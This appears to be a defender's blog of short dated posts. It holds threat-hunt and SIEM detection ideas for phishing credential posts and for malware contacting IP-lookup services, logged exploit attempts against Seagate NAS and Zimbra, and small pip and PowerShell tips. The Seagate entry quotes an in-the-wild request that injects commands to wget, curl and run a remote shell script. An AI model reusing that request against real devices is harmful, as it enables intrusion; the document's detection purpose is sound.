proxy #threathunt idea:
where urlpath = '/next.php' and method = 'POST' and referrer is null cred #phishing 9/10/21 Sharepoint Theme sbj: notification 1 new FAX from: mout.kundenserver[.de 212.227.126.134 HTML attachment posts stolen creds to gms4372.nelrg[.com/gfkn/next.phpFriday, September 10, 2021
Threat Hunt - Proxy Phishing from HTML attachment
Threat Hunt - Proxy C2 IP with PHP
potential proxy #threathunt idea
Siem Rule - IP Lookup Service
Malware IP lookup service #siem detection rule idea
dns request in:
- canireachthe.net
- ipv4.icanhazip.com
- ip.anysrc.net
- edns.ip-api.com
- wtfismyip.com
- checkip.dyndns.org
- api.2ip.ua
- icanhazip.com
- api.ipify.org
- ip-api.com
- checkip.amazonaws.com
- ipecho.net
- ipinfo.io
- ipv4bot.whatismyipaddress.com
- freegeoip.app
imagename not in
- brave.exe
- iexplore.exe
- opera.exe
- firefox.exe
- msedge.exe
- chrome.exe
- vivaldi.exe
Wednesday, August 18, 2021
CVE-2014-3206 Seagate NAS RCE
CVE-2014-3206 Seagate NAS RCE
Seen August 7th, 2021 exploiting by 155.4.223[.]53
GET /backupmgt/localJob.php?session=fail;cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72/lolol.sh;sh+lolol.sh
https://www.exploit-db.com/exploits/33159
CVE-2020-7796 SSRF Zimbra
Sample exploit attempt of
"CVE-2020-7796" -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7796… "...Potential for SSRF if WebEx zimlet installed and zimlet JSP enabled..." -> https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7… Vuln Details -> https://github.com/Zimbra/zm-zimlets/commit/def0d6bbcd368eaa0c177935ba4c22e63039d94c… Seen this week from 103.138.125[.]199 #CVE20207796Monday, June 7, 2021
Python PIP Upgrade or Install Fails : SSL: CERTIFICATE_VERIFY_FAILED behind Proxy
If you're behind a proxy or getting these errors when installing or upgrading python packages or PIP itself
python -m pip install --upgrade pip
WARNING: Retrying (Retry(total=4, connect=None, read=None, redirect=None, status=None)) after connection broken by 'SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate in certificate chain (_ssl.c:1123)'))': /simple/pip/
Then try these extra parameters to trust Python sites (only do this if you trust the proxy)
python -m pip install --trusted-host pypi.org --trusted-host files.pythonhosted.org --upgrade pip
Collecting pip
Downloading pip-21.1.2-py3-none-any.whl (1.5 MB)
|████████████████████████████████| 1.5 MB 1.3 MB/s
Friday, June 4, 2021
Windows Event TimeGenerated TimeWritten Date Conversion Powershell
In windows event logs if you see
TimeGenerated=1622614277 TimeWritten=1622614277
and want the actual time use the .NET/powershell code
[timezone]::CurrentTimeZone.ToLocalTime(([datetime]'1/1/1970').AddSeconds("1622614277"))
Wednesday, June 2, 2021 1:11:17 AM